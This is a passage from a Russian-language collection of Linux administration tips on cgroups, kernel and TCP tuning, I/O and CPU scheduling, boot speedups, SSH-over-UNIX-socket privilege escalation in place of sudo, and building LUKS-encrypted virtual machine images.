cpuacct.usage │ │ ├── cpuacct.usage_percpu │ │ ├── cpu.shares │ │ ├── notify_on_release │ │ └── tasks │ ├── tasks │ └── tomcat │ ├── cgroup.procs │ ├── cpuacct.stat │ ├── cpuacct.usage │ ├── cpuacct.usage_percpu │ ├── cpu.shares │ ├── notify_on_release │ └── tasks ├── notify_on_release ├── release_agent ├── default │ ├── cgroup.procs │ ├── cpuacct.stat │ ├── cpuacct.usage │ ├── cpuacct.usage_percpu │ ├── cpu.shares │ ├── notify_on_release │ └── tasks └── tasks Теперь необходимо чтобы процессы запущенные в системе распределялись по нужным группам. Это можно сделать с помощью менеджера правил cgred, конфигурационный файл которого расположен в /etc/cgrules.conf. Конфигурация для нашей задачи представлена ниже: <user> <controllers> <destination> *:tomcat cpu daemons/tomcat/ *:postgres cpu daemons/postgres/ * cpu default/ Данные правила переносят все процессы с именем tomcat запущенных любым пользователем в группу daemons/tomcat, все процессы postgres в группу daemons/postgres и все остальные в default. Тем самым обеспечивая выполнения поставленной задачи. Для решения задачи использовалась только одна подсистема cpu, которая отвечает за распределение вычислительных ресурсов по группам. Кроме неё в debian по умолчанию доступны следующие группы: cpuacct - для отображения потребленных ресурсов CPU; cpuset - привязывает группу к конкретному процессору; ns - обеспечивает создание именованных пространств в которых допускается взаимодействие между процессами и запрещается взаимодействие между процессами из разных пространств; devices - позволяет ограничивать доступ к устройствам; freezer - позволяет приостанавливать выполнение задач; net_cls - тегирует сетевые пакеты, и далее с помощью traffic controller реализуются различные правила для этих пакетов.

Оптимизация отзывчивости десктоп-системы через использование cgroup в Linux (доп. ссылка 1) (доп. ссылка 2) Автор: Stax [комментарии]

По заявлению одного из разработчиков из компании Red Hat добиться эффекта существенного повышения отзывчивости десктоп-систем в условиях большой фоновой нагрузки, связанной с запуском ресурсоемких задач, можно через использование cgroup без дополнительных патчей Linux-ядра. Более того, утверждается что cgroup-метод работает даже лучше патча с привязкой групп планирования к TTY. Метод проверен на Linux-ядре 2.6.32. В /etc/rc.local добавляем: mkdir -p /dev/cgroup/cpu mount -t cgroup cgroup /dev/cgroup/cpu -o cpu mkdir -m 0777 /dev/cgroup/cpu/user В ~/.bashrc: if [ "$PS1" ] ; then mkdir -m 0700 /dev/cgroup/cpu/user/$$ echo $$ > /dev/cgroup/cpu/user/$$/tasks fi Для автоматического удаления групп, в которых больше нет процессов: создать /usr/local/sbin/cgroup_clean #!/bin/sh rmdir /dev/cgroup/$1 в rc.local добавить: echo "1" > /dev/cgroup/cpu/user/notify_on_release echo "/usr/local/sbin/cgroup_clean" > /dev/cgroup/cpu/release_agent

Тюнинг нагруженного CentOS севера при помощи ktune (доп. ссылка 1) [комментарии]

В репозитории CentOS присутствуетпакет ktune, содержащий набор готовых настроек для оптимизации работы ядра на машинах с большим размером ОЗУ в ситуациях повышенной сетевой и дисковой нагрузки. Например, ktune увеличивает размер TCP/IP буферов, включает планировщик ввода/вывода deadline, устанавливает оптимальные значения для pagecache и т.п. Полный список настроек можно найти в файлах /etc/sysctl.ktune и /etc/sysconfig/ktune для активации необходимо выполнить: yum install ktune chkconfig ktune on service ktune start Устанавливаются следующие sysctl: # Устанавливаем в 256 Кб размер буферов по умолчанию для приема и отправки данных через сокеты net.core.rmem_default = 262144 net.core.wmem_default = 262144 # Устанавливаем в 8Мб максимальный размер буфера сокетов. net.core.rmem_max = 8388608 net.core.wmem_max = 8388608 # Максимальный размер очереди пакетов для 10 гб или объединенных гигабитных линков net.core.netdev_max_backlog = 10000 # Тюнинг буферов для TCP и UDP соединений (для машин с большим объемом ОЗУ) net.ipv4.tcp_rmem = 8192 87380 8388608 net.ipv4.tcp_wmem = 8192 65536 8388608 net.ipv4.udp_rmem_min = 16384 net.ipv4.udp_wmem_min = 16384 net.ipv4.tcp_mem = 8388608 12582912 16777216 net.ipv4.udp_mem = 8388608 12582912 16777216 # Понижаем приоритет начала своппинга vm.swappiness = 30 # Начинаем принудительно чистить буферы, когда они занимают более 50% размера ОЗУ vm.dirty_ratio = 50 # Ограничиваем размер файлового кеша, предотвращая начало свопинга vm.pagecache = 90 Включаем deadline планировщик для диска sda: echo deadline > /sys/block/sda/queue/scheduler

Решение проблемы с потерей пакетов в tcpdump в Linux (доп. ссылка 1) Автор: Kirill Korinsky [комментарии]

При записи пакетов используя tcpdump на больших скоростях возможна потеря пакетов. Для 1 гигабита помогли такие изменения в /etc/sysctl.conf: net.core.rmem_default = 33554432 net.core.rmem_max = 33554432 net.core.netdev_max_backlog = 16384

Уменьшение времени загрузки Ubuntu Linux (доп. ссылка 1) (доп. ссылка 2) [комментарии]

1. Уменьшение таймаута в grub, vi /boot/grub/menu.lst timeout=0 или через GUI System -> Administration -> StartUp-Manager 2. Отключаем ненужные сервисы: Меню System -> Preferences -> Sessions (Сеансы) Например, можно отключить: Bluetooth Manager (Менеджер устройств Bluetooth) Check for new hardware drivers Evolution Alarm Notifier Print Queue Applet (Апплет очереди печати) Tracker (служба поиска и индексирования) Меню System -> Administration -> Services (Службы) или через консольную утилиту sysv-rc-conf Можно отключить загрузку редко используемых служб, например, RPC, NFS, avahi-daemon, cupsys, apport, ssh. 3. Оптимизация монтирования файловых систем: в /etc/fstab добавляем опции "noatime,nodiratime", 4. Уменьшение интенсивности работы с свопом в /etc/sysctl.conf добавляем vm.swappiness=10 5. Включение возможности параллельного старта сервисов на этапе загрузки: в /etc/init.d/rc меняем CONCURRENCY=none на CONCURRENCY=shell 6. Кэширование программ и библиотек используемых на этапе инициализации. Единоразово загружаем Ubuntu с передачей ядру параметра profile, на этапе работы grub, который включает режим профилирования. Грузиться с этим флагом будет заведомо медленнее, но при загрузке с флагом профилирования в Ubunti активируется сервис readahead, который обновляет информацию о всех используемых на этапе загрузки библиотеках и утилитах в файле /etc/readahead/boot, а в /etc/readahead/desktop - информацию о загрузке десктоп окружения. При следующей загрузке сервис readahead, при помощи программы /sbin/readahead-list, загрузит библиотеки и программы, упоминающиеся в индексе, в page cache, что немного уменьшит время загрузки. 7. Отключаем IPv6 в /etc/modprobe.d/aliases заменяем строку "alias net-pf-10 ipv6" на "alias net-pf-10 off #ipv6". 7. Устанавливаем preload sudo apt-get install preload в установке prelink нет необходимости, так как в Ubuntu задейстован альтернативный механизм линковки DT_GNU_HASH (http://lwn.net/Articles/192624/), поддерживаемый в Glibc 2.5. Подробнее о включении prelink и preload см. https://www.opennet.ru/tips/info/1695.shtml

Уменьшение времени запуска программ в Ubuntu при помощи prelink и preload (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Prelink позволяет уменьшить время загрузки приложений, слинкованных со множеством динамических библиотек, путем оптимизации на уровне структуры ELF файла. aptitude install prelink /etc/cron.daily/prelink Preload - другое средство уменьшения времени запуска, основанное на предварительной загрузке в память наиболее интенсивно используемых данных, не дожидаясь непосредственного запуска программы (эффективно для повторных запусков). aptitude install preload Как правило конфигурация по умолчанию (/etc/preload.conf) не требует изменений, но при желании можно обратить внимание на опции: model.cycle (по умолчанию 20 сек) - как часто будет инициирован анализ состояния системы и обновление кэша; model.halflife ( по умолчанию 168 часов) - через какое время данные в кэше будут считаться устаревшими (каждый halflife степень актуальности данных в кэше будет уменьшена на 50%); model.minsize (по умолчанию 2000000 байт) - минимальный объем данных прошедший через системные вызовы, необходимый для начала оптимизации приложения. Позволяет использовать preload только для крупных приложений. model.memtotal (-10%), model.memfree (100%), model.memcached (30%) - директивы определяющие степень использования ОЗУ для хранения кэша. Размер кэша рассчитывается по формуле: model.memtotal * размер ОЗУ + model.memfree * размер свободной памяти во время запуска preload + model.memcached * размер памяти отведенной под системный кэш (Cached). Состояние работы preload можно оценить через файл /var/lib/preload/preload.state Если prelink, как правило, запускается раз в день и модифицирует ELF файлы, то preload оформлен в виде программы-демона, постоянно наблюдающего за интенсивностью запуска программ и на основании собранной статистики загружающего компоненты в память. Выигрыш от использования prelink для OpenOffice.org и Firefox около 15-20%, для preload - 50%.

Как минимизировать влияние бэкап-скрипта на интенсивность ввода/вывода в Linux (доп. ссылка 1) [комментарии]

Задача сделать так, чтобы выполнение скрипта для бэкапа не сказывалось на производительности приложений с интенсивными дисковыми операциями. Решение - понижение приоритета скрипта в планировщике ввода/вывода CFQ, который включен в Linux ядро, начиная с версии 2.6.13, и используется по умолчанию начиная с 2.6.18. Проверяем, что активный планировщик у нас CFQ: for d in /sys/block/sd[a-z]/queue/scheduler; do echo "$d => $(cat $d)" ; done Видим: /sys/block/sda/queue/scheduler => noop anticipatory deadline [cfq] Запускаем скрипт бэкапа с пониженным приоритетом: nice -n 19 ionice -c2 -n7 backup.sh утилитой nice с самым низким приоритетом вызываем утилиту ionice cо 2 классом планировки ( 1 - real time, 2 - нормальный режим, 3 - работа только в моменты простоя (idle)) и самым низким уровнем приоритета (7). Если процесс все равно мешает, можем на лету перевести его в idle режим: ionice -c3 -p 1004 или изменить приоритет планировщика: renice 19 -p 1004 Где 1004 - PID процесса.

Как в Linux привязать процесс к CPU и установить атрибуты планирования (доп. ссылка 1) [комментарии]

При необходимости увеличить производительность определенного процесса в системе, можно жестко привязать его к определенному CPU (CPU affinity), исключив ситуацию мигрирования между процессорами, а также изменить для него алгоритм работы планировщика задач и увеличить приоритет. Привязка к CPU осуществляется командой taskset, а изменение параметров real-time планирования командой chrt. Обе команды можно использовать каскадно, вызывая одну в качестве аргумента другой. Например: taskset -c 2-3 chrt -f 1 <command> привяжет выполнение команды к CPU со 2 по 3 ("-c 2-3", можно перечислять процессоры через запятую, например, "-c 2,3"), а также задействует политику планирования SCHED_FIFO ("-f") и установит приоритет 1 уровня. Политики планирования (описание - man sched_setscheduler): -b SCHED_BATCH -f SCHED_FIFO -o SCHED_OTHER -r SCHED_RR Изменение параметров для уже запущенного процесса производится при помощи опции "-p". Например, изменение параметров процесса с PID 123: taskset -c 2-3 -p 123 chrt -f 1 -p 123

Оптимизация структуры директорий в файловых системах ext2 и ext3 (доп. ссылка 1) [обсудить]

Опция "-D" утилиты e2fsck позволяет выполнить переиндексацию при использовании dir_index (tune2fs -O +dir_index), иначе выполнить перекомпановку с сортировкой (когда было создано или удалено большое количество директорий) и сокращением размера (когда в директории было много файлов, а потом их удалили). Пример запуска (/dev/sdb1 должен быть отмонтирован или переведен в режим только для чтения): # e2fsck -D -f /dev/sdb1

Ускорение работы сетевого интерфейса в Linux на SMP системах (доп. ссылка 1) Автор: Kir Kolyshkin [комментарии]

Если привязать прерывание от сетевой карты на один CPU, то пропускная способность Fast Ethernet возрастает примерно на 15% (измерения проводились на 2.4 ядре, но справедливо и для ядер 2.6). Определяем прерывание сетевой карты: cat /proc/interrupts Привязываем к определенному CPU: echo 2 > /proc/irq/NNN/smp_affinity где NNN -- прерывание от сетевухи, 2 - битовая маска для выборка CPU. если сетевухи две, для второй echo 4 > /proc/irq/MMM/smp_affinity Битовые маски: 1 - CPU1, 2 - CPU2, 4 - CPU3 и т.д. Подробнее см. Documentation/IRQ-affinity.txt При включении демона irqbalance значения smp_affinity выбираются динамически.

Приоритезация ввода/вывода в Linux (доп. ссылка 1) Автор: Андрей Авраменко [комментарии]

Приоритеты для использования Disk I/O С выходом CFQ v3 в Linux 2.6.13 появилась возможность выставлять приоритеты использования дисковой подсистемы для процессов, чего раньше так не хватало. Подобно утилите nice для назначение приоритетов использования процессора появилась утилита ionice. Синтаксис команды прост: ionice -c класс -n приоритет -p PID Класс: 3 - Idle - Получает приоритет на использование жесткого диска только когда другие программы ничего не пишут. Приоритеты не используются. 2 - Best Effort - Класс по-умолчанию. Доступные приоритеты [0-7]. 1 - Real Time - Дает преимущественный доступ к диску процессу, не смотря на другие процессы. Доступные приоритеты [0-7].

Как очистить кэш файловой системы в Linux ядре (доп. ссылка 1) [комментарии]

Начиная с Linux ядра 2.6.16 появилась возможность принудительной очистки системных кэшей: Чистим pagecache: echo 1 > /proc/sys/vm/drop_caches Чистим dentrie и inode кэши: echo 2 > /proc/sys/vm/drop_caches Чистим pagecache, dentrie и inode кэши: echo 3 > /proc/sys/vm/drop_caches Перед выполнением операции необходимо запустить команду sync

Тюнинг TCP стека в Linux (доп. ссылка 1) [комментарии]

Увеличиваем максимальный размер памяти отводимой для TCP буферов: (16Мб на порядок больше, чем нужно, следует экспериментальным путем подобрать оптимальные значения, понеменогу увеличивая параметры заданные по умолчанию) sysctl -w net.core.rmem_max = 16777216 sysctl -w net.core.wmem_max = 16777216 Увеличиваем лимиты автотюнинга (min, default, max bytes) sysctl -w net.ipv4.tcp_rmem = "4096 87380 16777216" sysctl -w net.ipv4.tcp_wmem = "4096 65536 16777216" Увеличиваем размер очереди пакетов на сетевом интерфейсе, особенно полезно для Gigabit Ethernet: ifconfig eth0 txqueuelen 1000 Особенности Linux ядра 2.4.x: Для предотвращения особенности при уменьшении размера окна, из-за повторов передеачи пакетов, для одного соединения, уменьшать на 10 минут размер окна для всех остальных соединений к тому же хосту: sysctl -w net.ipv4.route.flush=1 Особенности Linux ядра 2.6.x: Запрещаем кеширование статуса ssthresh (были ретрансмиты) для других соединений sysctl -w net.ipv4.tcp_no_metrics_save = 1 Рекомендуется увеличить размер backlog до 1000 или выше (для 10Gb линка можно поставить 30000): sysctl -w net.core.netdev_max_backlog = 2500 Начиная с ядра 2.6.13 можно менять алгоритм обработки ситуации перегрузки: sysctl -w net.ipv4.tcp_congestion_control=htcp reno: традиционный TCP bic: BIC-TCP (для высокоскоростных сетей, быстрое восстановление после потери) highspeed: HighSpeed TCP: Sally Floyd's suggested algorithm htcp: Hamilton TCP (для высокоскоростных сетей) hybla: для спутниковых линков scalable: Scalable TCP vegas: TCP Vegas westwood: для сетей с большой потерей пакетов Когда стандартный reno не устраивает рекомендуется попробовать bic или htcp. Значения параметров тюнинга подробно описаны в документе ip-sysctl.txt в комплекте ядра: http://www-didc.lbl.gov/TCP-tuning/ip-sysctl-2.6.txt

Привязка процесса к определенному CPU в SMP системе под Linux (доп. ссылка 1) Автор: nixcraft [комментарии]

Пример использования жесткой привязки процесса к определенному процессору (CPU affinity). Устанавливаем пакет schedutils (Debian: apt-get install schedutils, Red Hat: up2date schedutils или rpm -ivh schedutils*) Привязка процесса с pid 13545 к первому CPU (#0): taskset -c 1 -p 13545 к 3 и 4 CPU (#2 и #3): taskset -c 3,4 -p 13545 Загрузку процессоров в SMP системе удобно оценивать через утилиту mpstat из пакета sysstat. mpstat -P ALL Утилизацию подсистемы ввода/вывода можно посмотреть через команду iostat

Как преодолеть ограничение в 32 группы на пользователя в Linux [обсудить]

В 2.2.x и 2.4.x Linux ядрах максимальное число групп в которые может входить один пользователь ограничено 32. Для 2.6.x лимит снят. Решение - пересборка ядра, при необходимости glibc и других утилит. Инструкции: http://radu.rendec.ines.ro/howto/32groups.html http://www.ussg.iu.edu/hypermail/linux/kernel/9907.1/0074.html

Как увеличить максимальное число процессов для 2.2.x Linux ядра [обсудить]

vi /usr/src/linux/include/linux/tasks.h #define NR_TASKS 512 #define MAX_TASKS_PER_USER (NR_TASKS/2)

Чем хороши LVM, ext3, reiserfs и xfs (доп. ссылка 1) Автор: Денис Смирнов [комментарии]

LVM - позволяет гибко создавать, удалять и изменять размеры разделов без потери данных. ext3 - расширение ext2 для журналирования. Поддерживает журналирование данных, а не только метаданных (при data=journal). reiserfs - высокая скорость работы с каталогами с большим числом файлов, компактно хранит хвосты от файлов, поддерживает увеличение размера раздела без остановки сервера. xfs - быстрая работа с файлами большого размера, великолепная надёжность, поддержка ACL.

Включение Hyper-Threading scheduler в Linux, для CPU Xeon. (доп. ссылка 1) [комментарии]

Linux поддерживает Hyper-Threading начиная с ядра 2.4.17. Ядро должно быть собрано как SMP, При загрузке, передаем параметр acpismp=force (в lilo: append=" acpismp=force") проверка работы: cat /proc/cpuinfo, если среди flags есть "ht", то Hyper-Threading активирован.

Как оптимизировать подсистемы распределения памяти в Linux. [обсудить]

/usr/src/linux/Documenation/sysctl/vm.txt /usr/src/linux/Documenation/filesystems/proc.txt Параметры для работы демона bdflush (vm.bdflush) echo "100 2000 128 512 500 5000 60 0 0" > /proc/sys/vm/bdflush Управление объемом ОЗУ (в %) выделенного для системных буфферов (лучше не трогать) echo "70 10 60" > /proc/sys/vm/buffermem Максимальный размер сегмента shared memory. echo 167772160 > /proc/sys/kernel/shmmax # (def: 33554432)

Оптимизация TCP/IP стека в Linux для нагруженного сервера. [комментарии]

/usr/src/linux/Documenation/filesystems/proc.txt /usr/src/linux/Documenation/networking/ip-sysctl.txt Далее в скобках указаны значения по умолчанию для 2.2.x/2.4.x ядер. Если ядро собрано с CONFIG_SYNCOOKIES для защиты от syn флуда (net.ipv4.tcpsyn_cookies) echo 1 > /proc/sys/net/ipv4/tcp_syncookies #(0/0) Увеличиваем размер backlog очереди (аналог sysctl net.ipv4.tcp_max_syn_backlog). echo 1280 > /proc/sys/net/ipv4/tcp_max_syn_backlog #(128/1024) Число начальных SYN и SYNACK пересылок для TCP соединения (лучше не трогать). echo 4 > /proc/sys/net/ipv4/tcp_synack_retries #(x/5) echo 4 > /proc/sys/net/ipv4/tcp_syn_retries #(10/5) Какие порты использовать в качестве локальных TCP и UDP портов (sysctl net.ipv4.ip_local_port_range). echo "16384 61000" > /proc/sys/net/ipv4/ip_local_port_range #(1024 4999/32768 61000) Сколько секунд ожидать приема FIN до полного закрытия сокета. echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout #(180/60) Как часто посылать сообщение о поддержании keep alive соединения. echo 1800 > /proc/sys/net/ipv4/tcp_keepalive_time #(7200/7200) Сколько пакетов проверки keepalive посылать, прежде чем соединение будет закрыто. echo 2 > /proc/sys/net/ipv4/tcp_keepalive_probes #(9/9) Запрещаем TCP window scaling (net.ipv4.tcp_window_scaling) echo 0 > /proc/sys/net/ipv4/tcp_window_scaling #(1/1) Запрещаем selective acknowledgements, RFC2018 (net.ipv4.tcp_sack). echo 0 > /proc/sys/net/ipv4/tcp_sack #(1/1) Запрещаем TCP timestamps, RFC1323 (net.ipv4.tcp_timestamps) echo 0 > /proc/sys/net/ipv4/tcp_timestamps #(1/1) Увеличиваем размер буфера для приема и отправки данных через сокеты. echo 1048576 > /proc/sys/net/core/rmem_max #(65535/autotune) echo 1048576 > /proc/sys/net/core/rmem_default #(65535/autotune) echo 1048576 > /proc/sys/net/core/wmem_max #(65535/autotune) echo 1048576 > /proc/sys/net/core/wmem_default #(65535/autotune) Если не требуется форвадинг пакетов (машина не рутер) выключаем. (net.ipv4.ip_forward и net.ipv4.conf.all.forwarding) echo 0 /proc/sys/net/ipv4/ip_forward #(0/0) echo 0 /proc/sys/net/ipv4/conf/all/forwarding #(0/0) Через какое время убивать соединеие закрытое на нашей стороне (net.ipv4.tcp_orphan_retries) echo 1 > /proc/sys/net/ipv4/tcp_orphan_retries #(x/7)

Оптимизация дисковой подсистемы в Linux [обсудить]

man hdparm (например: /sbin/hdparm -c3 -d1 -X34 /dev/hda) man elvtune man tune2fs echo 128000 > /proc/sys/fs/inode-max # def 16384 echo 64000 > /proc/sys/fs/file-max # def 4096 Число одновременно открытых файлов. cd /proc/sys/fs/ (в 2.4.x работает автотюнинг) /usr/src/linux/Documentation/sysctl/fs.txt /usr/src/linux/Documentation/filesystems/proc.txt

Как под Linux создать ramdisk большого размера для использования в качестве временного хранилища. [комментарии]

Советую использовать tmpfs или ramfs (разница в том, что данные tmpfs подвержены своппингу, ramfs создана для тестов, а ramdisk всегда хранится в ОЗУ) /usr/src/linux/Documentation/filesystems/tmpfs.txt mount -t tmpfs -osize=256M /dev/shm1 /mnt1 Для ramfs: mount -t ramfs -omaxsize=256M none /mnt1 Если желание использовать ramdisk осталось, читаем /usr/src/linux/Documentation/ramdisk.txt mkdir /ramdisk Для 256Мб ramdisk в lilo.conf добавляем: append="ramdisk_size=256000" Запускаем lilo и перезагружаем машину. mke2fs /dev/ram0 mount -t -ext2 /dev/ram0 /ramdisk

Как увеличить количество shared memory для работы высоконагруженного PostgreSQL [комментарии]

В linux: echo 134217728 >/proc/sys/kernel/shmall echo 134217728 >/proc/sys/kernel/shmmax В конфиге ядра FreeBSD: options SYSVSHM options SHMMAXPGS=4096 options SHMMAX="(SHMMAXPGS*PAGE_SIZE+1)" options SHMMIN=2 options SHMMNI=256 options SHMSEG=256 options SYSVSEM options SEMMAP=512 options SEMMNI=512 options SEMMNS=1024 options SEMMNU=512 options SEMMSL=256 options SEMOPM=256 options SEMUME=64 options SYSVMSG options MSGMNB=8192 options MSGMNI=256 options MSGSEG=8192 options MSGSSZ=16 options MSGTQL=128 options NMBCLUSTERS=16786 options NBUF=2048 maxusers 512

Эксперименты по борьбе с утечками памяти Telegram Desktop (доп. ссылка 1) Автор: nuclight [комментарии]

Известны жалобы о больших утечках памяти в Telegram Desktop на Linux, не наблюдаемых в таких же объемах на других ОС, в частности Windows и FreeBSD. В рамках проверки гипотезы о том, что дело в реализации системного аллокатора и настройках автопроигрывания медиа, помогающие автору TDesktop энтузиасты создали канал https://t.me/tdesktop_crash, продолжительная прокрутка которого должна приводить к утечкам памяти. При этом при нормальном поведении закрытие этого окна (переключение на другой чат) должна освобождать память. Выяснилось, что на Windows при переключении чата память освобождается, на обычном Linux glibc - не освобождаются несколько Гб, но происходит почти полное освобождение через некоторое время, если запустить Telegram Desktop с аллокатором jemalloc из FreeBSD (пример для Debian, подробности см. в документации jemalloc): LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libjemalloc.so.2 telegram-desktop Аналогичные (или даже лучше) результаты были получены на дистрибутивах без glibc, например Alpine, где применяется musl. Поскольку в разных дистрибутивах могут быть разные политики по сборке (статически и без), и майнтейнеры могут испытывать проблемы с включением решения, а современные аллокаторы сложны, и, возможно, glibc malloc может быть соответствующим образом настроен, к экспериментам и помощи приглашаются знатоки.

Решение проблемы с повышенным энергопотреблением при использовании Linux-ядер 2.6.38 и 2.6.39 (доп. ссылка 1) [комментарии]

В используемом в Ubuntu 11.04 и Fedora 15 Linux-ядре 2.6.38, а также в 2.6.39 и тестовых версиях 3.0-rc наблюдается возрастание энергопотребления на 10-30%. Кроме Phoronix подобная тенденция наблюдалась в тестах издания Tom's Hardware. По предварительным данным, одна из приводивших к повышению энергопотребления проблем связана с изменением в коде поддержки ASPM (Active-State Power Management) для плат PCI Express, который стал активироваться только при сигнализации о поддержке ASPM со стороны BIOS (определенные реализации BIOS указывают, что ASPM не поддерживается, но все равно инициализирует данную поддержку для некоторых устройств). Экспериментальным путем был выявлен обходной путь решения проблемы, который позволяет уменьшить энергопотребление в среднем на 15%. Для решения проблемы систему следует загрузить передав ядру в интерфейсе загрузчика GRUB параметр "pcie_aspm=force".

Увеличение безопасности Linux

Использование SSH поверх UNIX-сокета вместо sudo (доп. ссылка 1) [комментарии]

Тимоти Равье (Timothee Ravier) из компании Red Hat, мэйнтейнер проектов Fedora Silverblue и Fedora Kinoite, предложил заслуживающий внимания способ ухода от применения утилиты sudo, использующей suid-бит для повышения привилегий. Вместо sudo для выполнения обычным пользователем команд с правами root предлагается задействовать утилиту ssh с локальным соединением к той же системе через UNIX-сокет. Проверка полномочий осуществляется на основе SSH-ключей. Для ограничения доступ дополнительно может быть задействовано подтверждение полномочий при помощи USB-токена (например, Yubikey). Использование ssh вместо sudo позволяет избавиться от suid-программ в системе и организовать выполнение привилегированных команд в хост-окружении дистрибутивов, использующих контейнерную изоляцию компонентов, таких как Fedora Silverblue, Fedora Kinoite, Fedora Sericea и Fedora Onyx. Настраиваем серверные компоненты OpenSSH для доступа через локальный Unix-сокет (будет запускаться отдельный экземпляр sshd со своим файлом конфигурации): /etc/systemd/system/sshd-unix.socket: [Unit] Description=OpenSSH Server Unix Socket Documentation=man:sshd(8) man:sshd_config(5) [Socket] ListenStream=/run/sshd.sock Accept=yes [Install] WantedBy=sockets.target /etc/systemd/system/sshd-unix@.service: [Unit] Description=OpenSSH per-connection server daemon (Unix socket) Documentation=man:sshd(8) man:sshd_config(5) Wants=sshd-keygen.target After=sshd-keygen.target [Service] ExecStart=-/usr/sbin/sshd -i -f /etc/ssh/sshd_config_unix StandardInput=socket /etc/ssh/sshd_config_unix: # Оставляет только аутентификацию по ключам PermitRootLogin prohibit-password PasswordAuthentication no PermitEmptyPasswords no GSSAPIAuthentication no # ограничиваем доступ выбранным пользователям AllowUsers root adminusername # Оставляем только использование .ssh/authorized_keys (без .ssh/authorized_keys2 AuthorizedKeysFile .ssh/authorized_keys # включаем sftp Subsystem sftp /usr/libexec/openssh/sftp-server Активируем и запускаем юнит systemd: sudo systemctl daemon-reload sudo systemctl enable --now sshd-unix.socket Добавляем свой SSH-ключ в /root/.ssh/authorized_keys Настраиваем работу SSH-клиента. Устанавливаем утилиту socat: sudo dnf install socat Дополняем /.ssh/config, указав socat в качестве прокси для доступа через UNIX-сокет: Host host.local User root # Используем /run/host/run вместо /run для работы из контейнеров ProxyCommand socat - UNIX-CLIENT:/run/host/run/sshd.sock # Путь к SSH-ключу IdentityFile ~/.ssh/keys/localroot # Включаем поддержку TTY для интерактивной оболочки RequestTTY yes # Убираем лишний вывод LogLevel QUIET В текущем виде пользователь adminusername теперь сможет выполнить команды с правами root без ввода пароля. Проверяем работу: $ ssh host.local [root ~]# Создаём в bash псевдоним sudohost для запуска "ssh host.local" по аналогии с sudo: sudohost() { if [[ ${#} -eq 0 ]]; then ssh host.local "cd \"${PWD}\"; exec \"${SHELL}\" --login" else ssh host.local "cd \"${PWD}\"; exec \"${@}\"" fi } Проверяем: $ sudohost id uid=0(root) gid=0(root) groups=0(root) Добавляем проверку полномочий и включаем двухфакторную аутентификацию, допускающую доступ к root только при вставке USB-токена Yubikey. Проверяем, какие алгоритмы поддерживает имеющийся Yubikey: lsusb -v 2>/dev/null | grep -A2 Yubico | grep "bcdDevice" | awk '{print $2}' Если выведено 5.2.3 или большее значение, используем ed25519-sk при генерации ключей, иначе - ecdsa-sk: ssh-keygen -t ed25519-sk или ssh-keygen -t ecdsa-sk Добавляет открытый ключ в /root/.ssh/authorized_keys Добавляем привязку к типу ключа в конфигурацию sshd: /etc/ssh/sshd_config_unix: PubkeyAcceptedKeyTypes sk-ecdsa-sha2-nistp256@openssh.com,sk-ssh-ed25519@openssh.com Ограничиваем доступ к Unix-сокету только пользователя, которому можно повышать привилегии (в нашем примере - adminusername). В /etc/systemd/system/sshd-unix.socket добавляем: [Socket] ... SocketUser=adminusername SocketGroup=adminusername SocketMode=0660

Создание шифрованных образов виртуальных машин (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Инструкция по созданию полностью зашифрованного образа гостевой системы, в котором шифрование охватывает корневой раздел и стадию загрузки. Извлекаем содержимое корневого раздела образа виртуальной машины, который требуется зашифровать, в tar-архив vm_root.tar. Проверяем, чтобы в образе были необходимые для шифрования и EFI-загрузки разделов утилиты, такие как cryptodisk и grub-efi. Создаём файл с дисковым образом, содержащим два раздела - небольшой раздел для EFI (p1, 100МБ) и корневой раздел, содержимое которого будет зашифровано (p2). truncate -s 4GB disk.img parted disk.img mklabel gpt parted disk.img mkpart primary 1Mib 100Mib parted disk.img mkpart primary 100Mib 100% parted disk.img set 1 esp on parted disk.img set 1 boot on Настраиваем EFI на первом разделе и дисковое шифрование LUKS на втором. Для повышения защищённости можно заполнить шифрованный раздел случайными числами, но это приведёт к увеличению размера итогового образа qcow2. Создаём на шифрованном разделе ФС Ext4. привязываем образ к loop-устройству losetup -P -f disk.img определяем имя созданного устройства (/dev/loopN), в дальнейшем используем переменную $l вместо устройства l=($(losetup -l|grep disk.img)) создаём раздел с EFI, используем VFAT mkfs.vfat ${l}p1 определяем UUID раздела EFI blkid ${l}p1 создаём шифрованный раздел, в процессе задаём временный пароль для расшифровки cryptsetup --type luks1 luksFormat ${l}p2 определяем UUID шифрованного раздела blkid ${l}p2 активируем шифрованный раздел и создаём на нём ФС ext4 cryptsetup luksOpen ${l}p2 cr_root mkfs.ext4 /dev/mapper/cr_root монтируем раздел, копируем в него содержимое tar-архива с начинкой корневого раздела и создаём каталоги для точек монтирования /run, /sys, /proc и /dev. mount /dev/mapper/cr_root /mnt tar -C /mnt -xpf vm_root.tar for m in run sys proc dev; do mount --bind /$m /mnt/$m; done входим в окружение созданного корневого раздела chroot /mnt В /etc/fstab определяем метку корневого раздела (/dev/disk/cr_root) и раздела EFI (/boot/efi). Настраиваем и устанавливаем загрузчик GRUB (в некоторых дистрибутивах вместо /boot/grub используется /boot/grub2, а вместо префикса "grub" - "grub2-"): echo "GRUB_ENABLE_CRYPTODISK=y" >> /etc/default/grub mount /boot/efi grub-install --removable --target=x86_64-efi grub-mkconfig -o /boot/grub/grub.cfg Для систем с mkinitramfs (Debian) дополнительно нужно добавить параметры шифрованного раздела в /etc/crypttab: cr_root UUID=<uuid> luks none После чего пересоздаём образ ram-диска с компонентами для начальной загрузки. Для систем с dracut требуется изменить настройки /etc/default/grub, указав в GRUB_CMDLINE_LINUX привязку rd.luks.uuid=<UUID>. Для дистрибутивов с SELinux также нужно обновить метки (relabel). Отмонтируем созданные в процессе подготовки образа разделы из /mnt и пытаемся загрузить образ, используя режим EFI. В процессе загрузки вводим заданный ранее временный пароль и проверяем работоспособность окружения. Заменяем временный пароль на ключ для быстрой загрузки и настраиваем ram-диск для его использования. Для образа, примонтированного через /dev/sda: dd if=/dev/urandom bs=1 count=33|base64 -w 0 > /etc/cryptsetup-keys.d/luks-<UUID>.key chmod 600 /etc/cryptsetup-keys.d/luks-<UUID>.key cryptsetup --key-slot 1 luksAddKey /dev/sda2 # первичный ключ для восстановления cryptsetup --key-slot 0 luksRemoveKey /dev/sda2 # удаляем временный ключ cryptsetup --key-slot 0 --iter-time 1 luksAddKey /dev/sda2 /etc/cryptsetup-keys.d/luks-<UUID>.key Указание опции "-w 0" в dd необходимо для того, чтобы исключить появление в пароле символа перевода строки. Для систем с mkinitramfs теперь 